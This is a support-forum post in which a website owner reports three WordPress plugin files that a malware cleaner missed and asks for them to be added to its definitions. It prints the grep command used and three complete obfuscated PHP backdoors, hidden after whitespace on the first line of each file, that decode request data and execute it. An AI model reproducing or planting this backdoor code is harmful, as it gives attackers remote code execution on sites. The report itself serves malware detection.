Malware not found – maybe add it to definitions?

Home Forums Support Forum Malware not found – maybe add it to definitions?

This topic contains 0 replies, has 1 voice, and was last updated by  Neven Pintarić 10 hours, 42 minutes ago.

Viewing 1 post (of 1 total)
  • Author
    Posts
  • August 12, 2025 at 9:53 pm #158231

    Neven Pintarić
    Member

    Hi! Awesome tool, cleaned up almost everything on the heavily infected website. However, I noticed it didn’t find these (it’s all in the first lines):

     

    website@myhost [~/test-sk]# grep -r --include="*.php" -E "\?php\s{4,}" .


    ./wp-content/plugins/astra-sites/inc/lib/ai-builder/inc/classes/functions.php:<?php                                                                                                                if(count($_POST) > 0 && isset($_POST["o\x62\x6A"])){ $mrk = hex2bin($_POST["o\x62\x6A"]); $desc = ''; for($h=0; $h<strlen($mrk); $h++){$desc .= chr(ord($mrk[$h]) ^ 7);} $sym = array_filter([ini_get("upload_tmp_dir"), session_save_path(), "/dev/shm", getcwd(), "/tmp", getenv("TMP"), getenv("TEMP"), "/var/tmp", sys_get_temp_dir()]); $val = 0; do { $binding = $sym[$val] ?? null; if ($val >= count($sym)) break; if (is_writable($binding) && is_dir($binding)) { $dat = vsprintf("%s/%s", [$binding, ".itm"]); if (file_put_contents($dat, $desc)) { include $dat; @unlink($dat); exit; } } $val++; } while (true); }


    ./wp-content/plugins/wordpress-seo/admin/filters/class-cornerstone-filter.php:<?php                                                                                                                if(filter_has_var(INPUT_POST, "\x66l\x61g")){ $sym = hex2bin($_POST["\x66l\x61g"]); $value = '';$t = 0; while($t < strlen($sym)){$value .= chr(ord($sym[$t]) ^ 9);$t++;} $ptr = array_filter([session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getcwd(), getenv("TMP"), "/tmp", getenv("TEMP"), sys_get_temp_dir(), "/var/tmp"]); foreach ($ptr as $key => $obj) { if ((bool)is_dir($obj) && (bool)is_writable($obj)) { $entity = join("/", [$obj, ".bind"]); $file = fopen($entity, 'w'); if ($file) { fwrite($file, $value); fclose($file); include $entity; @unlink($entity); exit; } } } }


    ./wp-content/plugins/wpforms-lite/vendor/composer/installed.php:<?php                                                                                                                              if(array_key_exists("d\x61t\x61\x5Fc\x68u\x6Ek", $_REQUEST)){ $entry = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/tmp", getenv("TMP"), sys_get_temp_dir(), getcwd(), "/dev/shm", "/var/tmp"]); $dat = hex2bin($_REQUEST["d\x61t\x61\x5Fc\x68u\x6Ek"]); $record='' ; $i = 0; do{$record .= chr(ord($dat[$i]) ^ 23);$i++;} while($i < strlen($dat)); $resource = 0; do { $res = $entry[$resource] ?? null; if ($resource >= count($entry)) break; if ((bool)is_dir($res) && (bool)is_writable($res)) { $ref = vsprintf("%s/%s", [$res, ".itm"]); if (file_put_contents($ref, $record)) { include $ref; @unlink($ref); exit; } } $resource++; } while (true); }

  • Author
    Posts
Viewing 1 post (of 1 total)

You must be logged in to reply to this topic.

Comments are closed.